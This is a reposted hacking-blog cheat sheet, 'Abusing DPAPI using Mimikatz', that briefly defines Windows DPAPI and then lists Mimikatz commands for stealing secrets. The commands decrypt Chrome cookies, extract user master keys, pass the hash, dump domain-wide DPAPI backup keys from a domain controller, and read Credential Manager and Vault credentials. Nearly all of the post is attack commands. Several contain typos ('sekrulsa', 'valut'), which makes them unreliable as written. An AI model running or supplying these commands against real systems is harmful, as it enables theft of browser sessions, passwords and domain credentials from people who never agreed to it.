Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>
Idioma: En

Abusing DPAPI using Mimikatz


What is Dpapi

According to wiki, DPAPI (Data Protection Application Programming Interface) is a simple cryptographic application programming interface available as a built-in component in Windows 2000 and later versions of Microsoft Windows operating systems. In theory the Data Protection API can enable symmetric encryption of any kind of data; in practice, its primary use in the Windows operating system is to perform symmetric encryption of asymmetric private keys, using a user or system secret as a significant contribution of entropy.

Related Articles


Abusing DPAPI 

#Decrypting Chrome Data when you have code execution on target
dpapi::chrome/in:"localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect

#Decrypting chrome data when the user is logged in and we have admin access 
#Get user's master key using mimikatz
mimikatz.exe
sekurlsa:dpapi 
sekrulsa:msv
#Show the decrypted content of  cookies 
dpapi::chrome/in:"c:\users\bhanu\appdata\local\Google\Chrome\User Data\Default\Cookies" /masterkey:t87fd5fdsftdsf5tds9f8dstf96ds5ds965f67sdftr67dssdf6ds87bf6ds8

#Decrypting chrome data when the user is NOT logged in and we have admin access using mimikatz
#NTLM/Plain text password of the user is required
dpapi::masterkey /in: /sid: /password: /protected

#Decrypt the masterkey when we know the user password
dpapi::masterkey /in:"User_KEy" /sid: /password: /protected

#Decrypt masterkey using default creds via shell 
dpapi::masterkey /in: /rpc
dpapi::masterkey /in:"C:\Users\bhanu\AppData\Roaming\Microsoft\Protect\S-1-5-21-803410069-3844050295-3216536831-1001\dg54tg-54g52-sad232r" /rpc
#now you can decrypt the credentials from cred manager
dpapi::creds /in:"C:\Users\bhanu\AppData\Local\Microsoft\Credentials\" /masterkey: /unprotect

#Incase we only know the user's hash
sekurlsa::pth /user:User_Name /domain:Steins.local /ntlm:98d6sa987dytsa7d9gsa987dagd
dpapi::masterkey /in:"C:\Users\bhanu\AppData\Roaming\Microsoft\Protect\S-1-5-21-803410069-3844050295-3216536831-1001\adssad32q-waE32q432-ae3q432-Ae3q432" /rpc
dpapi::masterkey /in:""
#Decrypt chrome data 
dpapi::chrome /in:"c:\users\bhanu\appdata\local\Google\Chrome\User Data\Default\Cookies"

#When you have access to Domain Controller 
# domain user master keys are also protected  with a domain wide backup DPAPI key, this can be extracted for decrypting any domain user masterkey. 
# Dump the backup keys
lsadump::backupkeys /system: /export
#use these keys to decrypt the data on any target machine from the same domain.
dpapi::masterkey /in:”” /pvk:
dpapi::chrome /in:"c:\users\bhanu\appdata\local\Google\Chrome\User Data\Default\Cookies"

#Decrypting Valut keys using mimikatz
#valut creds and AES keys used to encrypt the creds are stored under C:\Users\bhanu\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28;
vault::list
#for plaintext creds
vault::cred
valut::cred /patch






Hacking Dream


This post first appeared on Hacking Dream, please read the originial post: here

Share the post

Abusing DPAPI using Mimikatz

×

Subscribe to Hacking Dream

Get updates delivered right to your inbox!

Thank you for your subscription

×